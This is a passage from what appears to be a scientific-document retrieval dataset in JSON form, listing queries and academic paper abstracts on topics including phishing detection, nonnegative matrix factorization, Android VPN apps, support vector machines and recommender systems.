"text": "Nonnegative matrix factorization (NMF) is a widely-used method for low-rank approximation (LRA) of a nonnegative matrix (matrix with only nonnegative entries), where nonnegativity constraints are imposed on factor matrices in the decomposition. A large body of past work on NMF has focused on the case where the data matrix is complete. In practice, however, we often encounter with an incomplete data matrix where some entries are missing (e.g., a user-rating matrix). Weighted low-rank approximation (WLRA) has been studied to handle incomplete data matrix. However, there is only few work on weighted nonnegative matrix factorization (WNMF) that is WLRA with nonnegativity constraints. Existing WNMF methods are limited to a direct extension of NMF multiplicative updates, which suffer from slow convergence while the implementation is easy. In this paper we develop relatively fast and scalable algorithms for WNMF, borrowed from well-studied optimization techniques: (1) alternating nonnegative least squares; (2) generalized expectation maximization. Numerical experiments on MovieLens and Netflix prize datasets confirm the useful behavior of our methods, in a task of collaborative prediction.",
"title": ""
},
{
"docid": "475fc34de30b8310a6eb2aba176f33fa",
"text": "A novel compact broadband water dense patch antenna with relatively thick air layer is introduced. The distilled water with high permittivity is located on the top of the low-loss, low-permittivity supporting substrate to provide an electric wall boundary. The dense water patch antenna is excited with cavity mode, reducing the impact of dielectric loss of the water on the antenna efficiency. The designs of loading the distilled water and T-shaped shorting sheet are applied for size reduction. The wide bandwidth is attributed to the coupling L-shaped probe, proper size of the coupled T-shaped shorting sheet, and thick air layer. As a result, the dimensions of the water patch are only 0.146 λ0 × 0.078 λ0 × 0.056 λ0. The proposed antenna has a high radiation up to 70% over the lower frequency band of 4G mobile communication from 690 to 960 MHz. Good agreements are achieved between the measured results and the simulated results.",
"title": ""
},
{
"docid": "b4d234b09b642b228e71bf3dee52ff62",
"text": "The Recurrent Neural Networks and their variants have shown promising performances in sequence modeling tasks such as Natural Language Processing. These models, however, turn out to be impractical and difficult to train when exposed to very high-dimensional inputs due to the large input-to-hidden weight matrix. This may have prevented RNNs’ large-scale application in tasks that involve very high input dimensions such as video modeling; current approaches reduce the input dimensions using various feature extractors. To address this challenge, we propose a new, more general and efficient approach by factorizing the input-to-hidden weight matrix using Tensor-Train decomposition which is trained simultaneously with the weights themselves. We test our model on classification tasks using multiple real-world video datasets and achieve competitive performances with state-of-the-art models, even though our model architecture is orders of magnitude less complex. We believe that the proposed approach provides a novel and fundamental building block for modeling highdimensional sequential data with RNN architectures and opens up many possibilities to transfer the expressive and advanced architectures from other domains such as NLP to modeling highdimensional sequential data.",
"title": ""
}
] | scidocsrr |
938cc882013afa3624e41bd3efff6988 | Modelling Intelligent Phishing Detection System for E-banking Using Fuzzy Data Mining | [
{
"docid": "816575ea7f7903784abba96180190ea3",
"text": "The decision tree output of Quinlan's ID3 algorithm is one of its major weaknesses. Not only can it be incomprehensible and difficult to manipulate, but its use in expert systems frequently demands irrelevant information to be supplied. This report argues that the problem lies in the induction algorithm itself and can only be remedied by radically altering the underlying strategy. It describes a new algorithm, PRISM which, although based on ID3, uses a different induction strategy to induce rules which are modular, thus avoiding many of the problems associated with decision trees.",
"title": ""
}
] | [
{
"docid": "147a8503cd6c3115e6ef881132df9df9",
"text": "Jitter and phase noise properties of phase-locked loops (PLL) are analyzed, identifying various forms of jitter and phase noise in PLLs. The effects of different building blocks on the jitter and phase noise performance of PLLs are demonstrated through a parallel analytical and graphical treatment of noise evolution in the phaselocked loop.",
"title": ""
},
{
"docid": "c4fa73bd2d6b06f4655eeacaddf3b3a7",
"text": "In recent years, the robotic research area has become extremely prolific in terms of wearable active exoskeletons for human body motion assistance, with the presentation of many novel devices, for upper limbs, lower limbs, and the hand. The hand shows a complex morphology, a high intersubject variability, and offers limited space for physical interaction with a robot: as a result, hand exoskeletons usually are heavy, cumbersome, and poorly usable. This paper introduces a novel device designed on the basis of human kinematic compatibility, wearability, and portability criteria. This hand exoskeleton, briefly HX, embeds several features as underactuated joints, passive degrees of freedom ensuring adaptability and compliance toward the hand anthropometric variability, and an ad hoc design of self-alignment mechanisms to absorb human/robot joint axes misplacement, and proposes a novel mechanism for the thumb opposition. The HX kinematic design and actuation are discussed together with theoretical and experimental data validating its adaptability performances. Results suggest that HX matches the self-alignment design goal and is then suited for close human-robot interaction.",
"title": ""
},
{
"docid": "c050cd384a1de34b0ba06c920c9634e6",
"text": "Grounding autonomous behavior in the nervous system is a fundamental challenge for neuroscience. In particular, self-organized behavioral development provides more questions than answers. Are there special functional units for curiosity, motivation, and creativity? This paper argues that these features can be grounded in synaptic plasticity itself, without requiring any higher-level constructs. We propose differential extrinsic plasticity (DEP) as a new synaptic rule for self-learning systems and apply it to a number of complex robotic systems as a test case. Without specifying any purpose or goal, seemingly purposeful and adaptive rhythmic behavior is developed, displaying a certain level of sensorimotor intelligence. These surprising results require no system-specific modifications of the DEP rule. They rather arise from the underlying mechanism of spontaneous symmetry breaking, which is due to the tight brain body environment coupling. The new synaptic rule is biologically plausible and would be an interesting target for neurobiological investigation. We also argue that this neuronal mechanism may have been a catalyst in natural evolution.",
"title": ""
},
{
"docid": "4c8b9d516d51df943d4c11da9cc092cf",
"text": "Cloud monitoring and analysis are challenging tasks that have recently been addressed by Complex Event Processing (CEP) techniques. CEP systems can process many incoming event streams and execute continuously running queries to analyze the behavior of a Cloud. Based on a Cloud performance monitoring and analysis use case, this paper experimentally evaluates different CEP architectures in terms of precision, recall and other performance indicators. The results of the experimental comparison are used to propose a novel dynamic CEP architecture for Cloud monitoring and analysis. The novel dynamic CEP architecture is designed to dynamically switch between different centralized and distributed CEP architectures depending on the current machine load and network traffic conditions in the observed Cloud environment.",
"title": ""
},
{
"docid": "0110e37c5525520a4db4b1a775dacddd",
"text": "This paper presents a study of Linux API usage across all applications and libraries in the Ubuntu Linux 15.04 distribution. We propose metrics for reasoning about the importance of various system APIs, including system calls, pseudo-files, and libc functions. Our metrics are designed for evaluating the relative maturity of a prototype system or compatibility layer, and this paper focuses on compatibility with Linux applications. This study uses a combination of static analysis to understand API usage and survey data to weight the relative importance of applications to end users.\n This paper yields several insights for developers and researchers, which are useful for assessing the complexity and security of Linux APIs. For example, every Ubuntu installation requires 224 system calls, 208 ioctl, fcntl, and prctl codes and hundreds of pseudo files. For each API type, a significant number of APIs are rarely used, if ever. Moreover, several security-relevant API changes, such as replacing access with faccessat, have met with slow adoption. Finally, hundreds of libc interfaces are effectively unused, yielding opportunities to improve security and efficiency by restructuring libc.",
"title": ""
},
{
"docid": "1926781cea974f3bcec281e1fca2a2e4",
"text": "................................................................................. 4 KOKKUVÕTE............................................................................... 5 ACKNOWLEDGEMENTS ............................................................ 6 PART I OVERVIEW.................................................................... 7",
"title": ""
},
{
"docid": "6b3c8e869651690193e66bc2524c1f56",
"text": "Convolutional Neural Networks (CNNs) have been widely used for face recognition and got extraordinary performance with large number of available face images of different people. However, it is hard to get uniform distributed data for all people. In most face datasets, a large proportion of people have few face images. Only a small number of people appear frequently with more face images. These people with more face images have higher impact on the feature learning than others. The imbalanced distribution leads to the difficulty to train a CNN model for feature representation that is general for each person, instead of mainly for the people with large number of face images. To address this challenge, we proposed a center invariant loss which aligns the center of each person to enforce the learned features to have a general representation for all people. The center invariant loss penalizes the difference between each center of classes. With center invariant loss, we can train a robust CNN that treats each class equally regardless the number of class samples. Extensive experiments demonstrate the effectiveness of the proposed approach. We achieve state-of-the-art results on LFW and YTF datasets.",
"title": ""
},
{
"docid": "719794106634ad35bedce96305bef83a",
"text": "With recent advances in mobile computing, the demand for visual localization or landmark identification on mobile devices is gaining interest. We advance the state of the art in this area by fusing two popular representations of street-level image data — facade-aligned and viewpoint-aligned — and show that they contain complementary information that can be exploited to significantly improve the recall rates on the city scale. We also improve feature detection in low contrast parts of the street-level data, and discuss how to incorporate priors on a user's position (e.g. given by noisy GPS readings or network cells), which previous approaches often ignore. Finally, and maybe most importantly, we present our results according to a carefully designed, repeatable evaluation scheme and make publicly available a set of 1.7 million images with ground truth labels, geotags, and calibration data, as well as a difficult set of cell phone query images. We provide these resources as a benchmark to facilitate further research in the area.",
"title": ""
},
{
"docid": "6b527c906789f6e32cd5c28f684d9cc8",
"text": "This paper addresses an essential application of microkernels; its role in virtualization for embedded systems. Virtualization in embedded systems and microkernel-based virtualization are topics of intensive research today. As embedded systems specifically mobile phones are evolving to do everything that a PC does, employing virtualization in this case is another step to make this vision a reality. Hence, recently, much time and research effort have been employed to validate ways to host virtualization on embedded system processors i.e., the ARM processors. This paper reviews the research work that have had significant impact on the implementation approaches of virtualization in embedded systems and how these approaches additionally provide security features that are beneficial to equipment manufacturers, carrier service providers and end users.",
"title": ""
},
{
"docid": "3792c6e065227cdbe8a9f87882224891",
"text": "The increasing size of workloads has led to the development of new technologies and architectures that are intended to help address the capacity limitations of DRAM main memories. The proposed solutions fall into two categories: those that re-engineer Flash-based SSDs to further improve storage system performance and those that incorporate non-volatile technology into a Hybrid main memory system. These developments have blurred the line between the storage and memory systems. In this paper, we examine the differences between these two approaches to gain insight into the types of applications and memory technologies that benefit the most from these different architectural approaches.\n In particular this work utilizes full system simulation to examine the impact of workload randomness on system performance, the impact of backing store latency on system performance, and how the different implementations utilize system resources differently. We find that the software overhead incurred by storage based implementations can account for almost 50% of the overall access latency. As a result, backing store technologies that have an access latency up to 25 microseconds tend to perform better when implemented as part of the main memory system. We also see that high degrees of random access can exacerbate the software overhead problem and lead to large performance advantages for the Hybrid main memory approach. Meanwhile, the page replacement algorithm utilized by the OS in the storage approach results in considerably better performance on highly sequential workloads at the cost of greater pressure on the cache.",
"title": ""
},
{
"docid": "2aea197bd094643ecc735b604501b602",
"text": "OBJECTIVE\nTo update previous meta-analyses of cohort studies that investigated the association between the Mediterranean diet and health status and to utilize data coming from all of the cohort studies for proposing a literature-based adherence score to the Mediterranean diet.\n\n\nDESIGN\nWe conducted a comprehensive literature search through all electronic databases up to June 2013.\n\n\nSETTING\nCohort prospective studies investigating adherence to the Mediterranean diet and health outcomes. Cut-off values of food groups used to compute the adherence score were obtained.\n\n\nSUBJECTS\nThe updated search was performed in an overall population of 4 172 412 subjects, with eighteen recent studies that were not present in the previous meta-analyses.\n\n\nRESULTS\nA 2-point increase in adherence score to the Mediterranean diet was reported to determine an 8 % reduction of overall mortality (relative risk = 0·92; 95 % CI 0·91, 0·93), a 10 % reduced risk of CVD (relative risk = 0·90; 95 % CI 0·87, 0·92) and a 4 % reduction of neoplastic disease (relative risk = 0·96; 95 % CI 0·95, 0·97). We utilized data coming from all cohort studies available in the literature for proposing a literature-based adherence score. Such a score ranges from 0 (minimal adherence) to 18 (maximal adherence) points and includes three different categories of consumption for each food group composing the Mediterranean diet.\n\n\nCONCLUSIONS\nThe Mediterranean diet was found to be a healthy dietary pattern in terms of morbidity and mortality. By using data from the cohort studies we proposed a literature-based adherence score that can represent an easy tool for the estimation of adherence to the Mediterranean diet also at the individual level.",
"title": ""
},
{
"docid": "45b082ddf4a813d6b95098ef5592bafc",
"text": "Estimating the frequencies of elements in a data stream is a fundamental task in data analysis and machine learning. The problem is typically addressed using streaming algorithms which can process very large data using limited storage. Today’s streaming algorithms, however, cannot exploit patterns in their input to improve performance. We propose a new class of algorithms that automatically learn relevant patterns in the input data and use them to improve its frequency estimates. The proposed algorithms combine the benefits of machine learning with the formal guarantees available through algorithm theory. We prove that our learning-based algorithms have lower estimation errors than their non-learning counterparts. We also evaluate our algorithms on two real-world datasets and demonstrate empirically their performance gains.",
"title": ""
},
{
"docid": "aa19ed0407ded7ff199310c69ed49229",
"text": "Due to the revolutionary advances of deep learning achieved in the field of image processing, speech recognition and natural language processing, the deep learning gains much attention. The recommendation task is influenced by the deep learning trend which shows its significant effectiveness and the high-quality of recommendations. The deep learning based recommender models provide a better detention of user preferences, item features and users-items interactions history. In this paper, we provide a recent literature review of researches dealing with deep learning based recommendation approaches which are preceded by a presentation of the main lines of the recommendation approaches and the deep learning techniques. We propose also classification criteria of the different deep learning integration model. Then we finish by presenting the recommendation approach adopted by the most popular video recommendation platform YouTube which is based essentially on deep learning advances. Keywords—Recommender system; deep learning; neural network; YouTube recommendation",
"title": ""
},
{
"docid": "ae218abd859370a093faf83d6d81599d",
"text": "In this letter, we present an autofocus routine for backprojection imagery from spotlight-mode synthetic aperture radar data. The approach is based on maximizing image sharpness and supports the flexible collection and imaging geometries of BP, including wide-angle apertures and the ability to image directly onto a digital elevation map. While image-quality-based autofocus approaches can be computationally intensive, in the backprojection setting, we demonstrate a natural geometric interpretation that allows for optimal single-pulse phase corrections to be derived in closed form as the solution of a quartic polynomial. The approach is applicable to focusing standard backprojection imagery, as well as providing incremental focusing in sequential imaging applications based on autoregressive backprojection. An example demonstrates the efficacy of the approach applied to real data for a wide-aperture backprojection image.",
"title": ""
},
{
"docid": "02289353fde7c497bed01195afd020dc",
"text": "In this paper, an electrical equivalent circuit for a proton exchange membrane (PEM) electrolyzer is used to develop a Simulink block diagram. The I-V characteristic for a single PEM electrolyzer cell is modeled under a steady-state and elaborated using an electrical equivalent circuit. Hydrogen production rates characteristics are developed with respect to the input current and power. It is clearly seen that the electrolytic hydrogen production rate increases with the input current in a linear fashion and the variation of hydrogen production rate with the input electrical power is non-linear (i.e. logarithmic). These characteristics are simulated using the developed Simulink/Matlab model of PEM electrolyzer cell. The parameters of the developed model can also be defined by taking into account temperature and pressure effects.",
"title": ""
},
{
"docid": "ef0625150b0eb6ae68a214256e3db50d",
"text": "Undergraduate engineering students require a practical application of theoretical concepts learned in classrooms in order to appropriate a complete management of them. Our aim is to assist students to learn control systems theory in an engineering context, through the design and implementation of a simple and low cost ball and plate plant. Students are able to apply mathematical and computational modelling tools, control systems design, and real-time software-hardware implementation while solving a position regulation problem. The whole project development is presented and may be assumed as a guide for replicate results or as a basis for a new design approach. In both cases, we end up in a tool available to implement and assess control strategies experimentally.",
"title": ""
},
{
"docid": "97680d32297b8c81388b463a7e98e2f3",
"text": "The research community has considered in the past the application of Artificial Intelligence (AI) techniques to control and operate networks. A notable example is the Knowledge Plane proposed by D.Clark et al. However, such techniques have not been extensively prototyped or deployed in the field yet. In this paper, we explore the reasons for the lack of adoption and posit that the rise of two recent paradigms: Software-Defined Networking (SDN) and Network Analytics (NA), will facilitate the adoption of AI techniques in the context of network operation and control. We describe a new paradigm that accommodates and exploits SDN, NA and AI, and provide use-cases that illustrate its applicability and benefits. We also present simple experimental results that support, for some relevant use-cases, its feasibility. We refer to this new paradigm as Knowledge-Defined Networking (KDN).",
"title": ""
},
{
"docid": "c924ea893ffd996cd0d024c4694199c1",
"text": "The recent approval of the General Data Protection Regulation (GDPR) imposes new data protection requirements on data controllers and processors with respect to the processing of European Union (EU) residents' data. These requirements consist of a single set of rules that have binding legal status and should be enforced in all EU member states. In light of these requirements, we propose in this paper the use of a blockchain-based approach to support data accountability and provenance tracking. Our approach relies on the use of publicly auditable contracts deployed in a blockchain that increase the transparency with respect to the access and usage of data. We identify and discuss three models for our approach with different granularity and scalability requirements where contracts can be used to encode data usage policies and provenance tracking information in a privacy-friendly way. From these three models we designed, implemented, and evaluated a model where contracts are deployed by data subjects for each data controller, and a model where subjects join contracts deployed by data controllers in case they accept the data handling conditions. Our implementations show in practice the feasibility and limitations of contracts for the purposes identified in this paper.",
"title": ""
},
{
"docid": "a63db4f5e588e23e4832eae581fc1c4b",
"text": "Driver drowsiness is a major cause of mortality in traffic accidents worldwide. Electroencephalographic (EEG) signal, which reflects the brain activities, is more directly related to drowsiness. Thus, many Brain-Machine-Interface (BMI) systems have been proposed to detect driver drowsiness. However, detecting driver drowsiness at its early stage poses a major practical hurdle when using existing BMI systems. This study proposes a context-aware BMI system aimed to detect driver drowsiness at its early stage by enriching the EEG data with the intensity of head-movements. The proposed system is carefully designed for low-power consumption with on-chip feature extraction and low energy Bluetooth connection. Also, the proposed system is implemented using JAVA programming language as a mobile application for on-line analysis. In total, 266 datasets obtained from six subjects who participated in a one-hour monotonous driving simulation experiment were used to evaluate this system. According to a video-based reference, the proposed system obtained an overall detection accuracy of 82.71% for classifying alert and slightly drowsy events by using EEG data alone and 96.24% by using the hybrid data of head-movement and EEG. These results indicate that the combination of EEG data and head-movement contextual information constitutes a robust solution for the early detection of driver drowsiness.",
"title": ""
}
] | scidocsrr |
1359acc6067a96e49ce77cb3225268a0 | Building book inventories using smartphones | [
{
"docid": "a7c330c9be1d7673bfff43b0544db4ea",
"text": "The state of the art in visual object retrieval from large databases is achieved by systems that are inspired by text retrieval. A key component of these approaches is that local regions of images are characterized using high-dimensional descriptors which are then mapped to ldquovisual wordsrdquo selected from a discrete vocabulary.This paper explores techniques to map each visual region to a weighted set of words, allowing the inclusion of features which were lost in the quantization stage of previous systems. The set of visual words is obtained by selecting words based on proximity in descriptor space. We describe how this representation may be incorporated into a standard tf-idf architecture, and how spatial verification is modified in the case of this soft-assignment. We evaluate our method on the standard Oxford Buildings dataset, and introduce a new dataset for evaluation. Our results exceed the current state of the art retrieval performance on these datasets, particularly on queries with poor initial recall where techniques like query expansion suffer. Overall we show that soft-assignment is always beneficial for retrieval with large vocabularies, at a cost of increased storage requirements for the index.",
"title": ""
},
{
"docid": "973cb430e42b76a041a0f1f3315d700b",
"text": "A growing number of mobile computing applications are centered around the user's location. The notion of location is broad, ranging from physical coordinates (latitude/longitude) to logical labels (like Starbucks, McDonalds). While extensive research has been performed in physical localization, there have been few attempts in recognizing logical locations. This paper argues that the increasing number of sensors on mobile phones presents new opportunities for logical localization. We postulate that ambient sound, light, and color in a place convey a photo-acoustic signature that can be sensed by the phone's camera and microphone. In-built accelerometers in some phones may also be useful in inferring broad classes of user-motion, often dictated by the nature of the place. By combining these optical, acoustic, and motion attributes, it may be feasible to construct an identifiable fingerprint for logical localization. Hence, users in adjacent stores can be separated logically, even when their physical positions are extremely close. We propose SurroundSense, a mobile phone based system that explores logical localization via ambience fingerprinting. Evaluation results from 51 different stores show that SurroundSense can achieve an average accuracy of 87% when all sensing modalities are employed. We believe this is an encouraging result, opening new possibilities in indoor localization.",
"title": ""
},
{
"docid": "3982c66e695fdefe36d8d143247add88",
"text": "A recognition scheme that scales efficiently to a large number of objects is presented. The efficiency and quality is exhibited in a live demonstration that recognizes CD-covers from a database of 40000 images of popular music CD’s. The scheme builds upon popular techniques of indexing descriptors extracted from local regions, and is robust to background clutter and occlusion. The local region descriptors are hierarchically quantized in a vocabulary tree. The vocabulary tree allows a larger and more discriminatory vocabulary to be used efficiently, which we show experimentally leads to a dramatic improvement in retrieval quality. The most significant property of the scheme is that the tree directly defines the quantization. The quantization and the indexing are therefore fully integrated, essentially being one and the same. The recognition quality is evaluated through retrieval on a database with ground truth, showing the power of the vocabulary tree approach, going as high as 1 million images.",
"title": ""
}
] | [
{
"docid": "2b493739c1012115b0800d047ab917a9",
"text": "Since developer ability is recognized as a determinant of better software project performance, it is a critical step to model and evaluate the programming ability of developers. However, most existing approaches require manual assessment, like 360 degree performance evaluation. With the emergence of social networking sites such as StackOverflow and Github, a vast amount of developer information is created on a daily basis. Such personal and social context data has huge potential to support automatic and effective developer ability evaluation. In this paper, we propose CPDScorer, a novel approach to modeling and scoring the programming ability of developer through mining heterogeneous information from both Community Question Answering (CQA) sites and Open-Source Software (OSS) communities. CPDScorer analyzes the answers posted in CQA sites and evaluates the projects submitted in OSS communities to assign expertise scores to developers, considering both the quantitative and qualitative factors. When modeling the programming ability of developer, a programming ability term extraction algorithm is also designed based on set covering. We have conducted experiments on StackOverflow and Github to measure the effectiveness of CPDScorer. The results show that our approach is feasible and practical in user programming ability modeling. In particular, the precision of our approach reaches 80%.",
"title": ""
},
{
"docid": "0de1e9759b4c088a15d84a108ba21c33",
"text": "MillWheel is a framework for building low-latency data-processing applications that is widely used at Google. Users specify a directed computation graph and application code for individual nodes, and the system manages persistent state and the continuous flow of records, all within the envelope of the framework’s fault-tolerance guarantees. This paper describes MillWheel’s programming model as well as its implementation. The case study of a continuous anomaly detector in use at Google serves to motivate how many of MillWheel’s features are used. MillWheel’s programming model provides a notion of logical time, making it simple to write time-based aggregations. MillWheel was designed from the outset with fault tolerance and scalability in mind. In practice, we find that MillWheel’s unique combination of scalability, fault tolerance, and a versatile programming model lends itself to a wide variety of problems at Google.",
"title": ""
},
{
"docid": "cd39810e2ddea52c003b832af8ef30aa",
"text": "Millions of users worldwide resort to mobile VPN clients to either circumvent censorship or to access geo-blocked content, and more generally for privacy and security purposes. In practice, however, users have little if any guarantees about the corresponding security and privacy settings, and perhaps no practical knowledge about the entities accessing their mobile traffic.\n In this paper we provide a first comprehensive analysis of 283 Android apps that use the Android VPN permission, which we extracted from a corpus of more than 1.4 million apps on the Google Play store. We perform a number of passive and active measurements designed to investigate a wide range of security and privacy features and to study the behavior of each VPN-based app. Our analysis includes investigation of possible malware presence, third-party library embedding, and traffic manipulation, as well as gauging user perception of the security and privacy of such apps. Our experiments reveal several instances of VPN apps that expose users to serious privacy and security vulnerabilities, such as use of insecure VPN tunneling protocols, as well as IPv6 and DNS traffic leakage. We also report on a number of apps actively performing TLS interception. Of particular concern are instances of apps that inject JavaScript programs for tracking, advertising, and for redirecting e-commerce traffic to external partners.",
"title": ""
},
{
"docid": "66ce4b486893e17e031a96dca9022ade",
"text": "Product reviews possess critical information regarding customers’ concerns and their experience with the product. Such information is considered essential to firms’ business intelligence which can be utilized for the purpose of conceptual design, personalization, product recommendation, better customer understanding, and finally attract more loyal customers. Previous studies of deriving useful information from customer reviews focused mainly on numerical and categorical data. Textual data have been somewhat ignored although they are deemed valuable. Existing methods of opinion mining in processing customer reviews concentrates on counting positive and negative comments of review writers, which is not enough to cover all important topics and concerns across different review articles. Instead, we propose an automatic summarization approach based on the analysis of review articles’ internal topic structure to assemble customer concerns. Different from the existing summarization approaches centered on sentence ranking and clustering, our approach discovers and extracts salient topics from a set of online reviews and further ranks these topics. The final summary is then generated based on the ranked topics. The experimental study and evaluation show that the proposed approach outperforms the peer approaches, i.e. opinion mining and clustering-summarization, in terms of users’ responsiveness and its ability to discover the most important topics. 2007 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "7082e7b9828c316b24f3113cb516a50d",
"text": "The analog voltage-controlled filter used in historical music synthesizers by Moog is modeled using a digital system, which is then compared in terms of audio measurements with the original analog filter. The analog model is mainly borrowed from D'Angelo's previous work. The digital implementation of the filter incorporates a recently proposed antialiasing method. This method enhances the clarity of output signals in the case of large-level input signals, which cause harmonic distortion. The combination of these two ideas leads to a novel digital model, which represents the state of the art in virtual analog musical filters. It is shown that without the antialiasing, the output signals in the nonlinear regime may be contaminated by undesirable spectral components, which are the consequence of aliasing, but that the antialiasing technique suppresses these components sufficiently. Comparison of measurements of the analog and digital filters show that the digital model is accurate within a few dB in the linear regime and has very similar behavior in the nonlinear regime in terms of distortion. The proposed digital filter model can be used as a building block in virtual analog music synthesizers.",
"title": ""
},
{
"docid": "61a6efb791fbdabfa92448cf39e17e8c",
"text": "This work deals with the design of a wideband microstrip log periodic array operating between 4 and 18 GHz (thus working in C,X and Ku bands). A few studies, since now, have been proposed but they are significantly less performing and usually quite complicated. Our solution is remarkably simple and shows both SWR and gain better than likely structures proposed in the literature. The same antenna can also be used as an UWB antenna. The design has been developed using CST MICROWAVE STUDIO 2009, a general purpose and specialist tool for the 3D electromagnetic simulation of microwave high frequency components.",
"title": ""
},
{
"docid": "9584909fc62cca8dc5c9d02db7fa7e5d",
"text": "As the nature of many materials handling tasks have begun to change from lifting to pushing and pulling, it is important that one understands the biomechanical nature of the risk to which the lumbar spine is exposed. Most previous assessments of push-pull tasks have employed models that may not be sensitive enough to consider the effects of the antagonistic cocontraction occurring during complex pushing and pulling motions in understanding the risk to the spine and the few that have considered the impact of cocontraction only consider spine load at one lumbar level. This study used an electromyography-assisted biomechanical model sensitive to complex motions to assess spine loadings throughout the lumbar spine as 10 males and 10 females pushed and pulled loads at three different handle heights and of three different load magnitudes. Pulling induced greater spine compressive loads than pushing, whereas the reverse was true for shear loads at the different lumbar levels. The results indicate that, under these conditions, anterior-posterior (A/P) shear loads were of sufficient magnitude to be of concern especially at the upper lumbar levels. Pushing and pulling loads equivalent to 20% of body weight appeared to be the limit of acceptable exertions, while pulling at low and medium handle heights (50% and 65% of stature) minimised A/P shear. These findings provide insight to the nature of spine loads and their potential risk to the low back during modern exertions.",
"title": ""
},
{
"docid": "e43cb8fefc7735aeab0fa40ad44a2e15",
"text": "Support vector machine (SVM) is an optimal margin based classification technique in machine learning. SVM is a binary linear classifier which has been extended to non-linear data using Kernels and multi-class data using various techniques like one-versus-one, one-versus-rest, Crammer Singer SVM, Weston Watkins SVM and directed acyclic graph SVM (DAGSVM) etc. SVM with a linear Kernel is called linear SVM and one with a non-linear Kernel is called non-linear SVM. Linear SVM is an efficient technique for high dimensional data applications like document classification, word-sense disambiguation, drug design etc. because under such data applications, test accuracy of linear SVM is closer to non-linear SVM while its training is much faster than non-linear SVM. SVM is continuously evolving since its inception and researchers have proposed many problem formulations, solvers and strategies for solving SVM. Moreover, due to advancements in the technology, data has taken the form of ‘Big Data’ which have posed a challenge for Machine Learning to train a classifier on this large-scale data. In this paper, we have presented a review on evolution of linear support vector machine classification, its solvers, strategies to improve solvers, experimental results, current challenges and research directions.",
"title": ""
},
{
"docid": "d896277dfe38400c9e74b7366ad93b6d",
"text": "This work is primarily focused on the design and development of an efficient and cost effective solar photovoltaic generator (PVG) based water pumping system implying a switched reluctance motor (SRM) drive. The maximum extraction of available power from PVG is attained by introducing an incremental conductance (IC) maximum power point tracking (MPPT) controller with Landsman DC-DC converter as a power conditioning stage. The CCM (continuous conduction mode) operation of Landsman DC-DC converter helps to reduce the current and voltage stress on its components and to realize the DC-DC conversion ratio independent of the load. The efficient utilization of SPV array and limiting the high initial inrush current in the motor drive is the primary concern of a Landsman converter. The inclusion of start-up control algorithm in the motor drive system facilitates the smooth self-starting of an 8/6 SRM drive. A novel approach to regulate the speed of the motor-pump system by controlling the DC link voltage of split capacitors converter helps in eliminating the voltage or current sensors required for speed control of SRM drive. The electronic commutated operation of mid-point converter considerably reduces its switching losses. This topology is designed and modeled in Matlab/Simulink platform and a laboratory prototype is developed to validate its performance under varying environmental conditions.",
"title": ""
},
{
"docid": "ce688082bc214936aff5c165ffb30c8d",
"text": "In this chapter, we review a few important concepts from Grid computing related to scheduling problems and their resolution using heuristic and meta-heuristic approaches. Scheduling problems are at the heart of any Grid-like computational system. Different types of scheduling based on different criteria, such as static vs. dynamic environment, multi-objectivity, adaptivity, etc., are identified. Then, heuristics and meta-heuristics methods for scheduling in Grids are presented. The chapter reveals the complexity of the scheduling problem in Computational Grids when compared to scheduling in classical parallel and distributed systems and shows the usefulness of heuristics and meta-heuristics approaches for the design of efficient Grid schedulers.",
"title": ""
},
{
"docid": "d03b46fc0afac5cae1e69e3f6048b478",
"text": "One of the crucial tasks of Critical Discourse Analysis (CDA) is to account for the relationships between discourse and social power. More specifically, such an analysis should describe and explain how power abuse is enacted, reproduced or legitimised by the text and talk of dominant groups or institutions. Within the framework of such an account of discursively mediated dominance and inequality this chapter focuses on an important dimension of such dominance, that is, patterns of access to discourse. A critical analysis of properties of access to public discourse and communication presupposes insight into more general political, sociocultural and economic aspects of dominance. This chapter merely gives a succinct summary of this broader conceptual framework. Leaving acide a detailed discussion of numerous philosophical and theoretical complexities, the major presuppositions of this framework are, for example, the following (see, e.g., Clegg, 1989; Lukes, 1974; 1986; Wrong, 1979):",
"title": ""
},
{
"docid": "1d0ca65e3019850f25445c4c2bbaf75d",
"text": "Cyber-physical systems are deeply intertwined with their corresponding environment through sensors and actuators. To avoid severe accidents with surrounding objects, testing the the behavior of such systems is crucial. Therefore, this paper presents the novel SMARDT (Specification Methodology Applicable to Requirements, Design, and Testing) approach to enable automated test generation based on the requirement specification and design models formalized in SysML. This paper presents and applies the novel SMARDT methodology to develop a self-adaptive software architecture dealing with controlling, planning, environment understanding, and parameter tuning. To formalize our architecture we employ a recently introduced homogeneous model-driven approach for component and connector languages integrating features indispensable in the cyber-physical systems domain. In a compelling case study we show the model driven design of a self-adaptive vehicle robot based on a modular and extensible architecture.",
"title": ""
},
{
"docid": "98c72706e0da844c80090c1ed5f3abeb",
"text": "Autoencoders provide a powerful framework for learning compressed representations by encoding all of the information needed to reconstruct a data point in a latent code. In some cases, autoencoders can “interpolate”: By decoding the convex combination of the latent codes for two datapoints, the autoencoder can produce an output which semantically mixes characteristics from the datapoints. In this paper, we propose a regularization procedure which encourages interpolated outputs to appear more realistic by fooling a critic network which has been trained to recover the mixing coefficient from interpolated data. We then develop a simple benchmark task where we can quantitatively measure the extent to which various autoencoders can interpolate and show that our regularizer dramatically improves interpolation in this setting. We also demonstrate empirically that our regularizer produces latent codes which are more effective on downstream tasks, suggesting a possible link between interpolation abilities and learning useful representations.",
"title": ""
},
{
"docid": "b676952c75749bb69efbd250f4a1ca61",
"text": "A discrete-event simulation model that imitates most on-track events, including car failures, passing manoeuvres and pit stops during a Formula One race, is presented. The model is intended for use by a specific team. It will enable decision-makers to plan and evaluate their race strategy, consequently providing them with a possible competitive advantage. The simulation modelling approach presented in this paper captures the mechanical complexities and physical interactions of a race car with its environment through a time-based approach. Model verification and validation are demonstrated using three races from the 2005 season. The application of the model is illustrated by evaluating the race strategies employed by a specific team during these three races. Journal of the Operational Research Society (2009) 60, 952–961. doi:10.1057/palgrave.jors.2602626 Published online 9 July 2008",
"title": ""
},
{
"docid": "ddfff31acb8d3302de5b11c76f06e839",
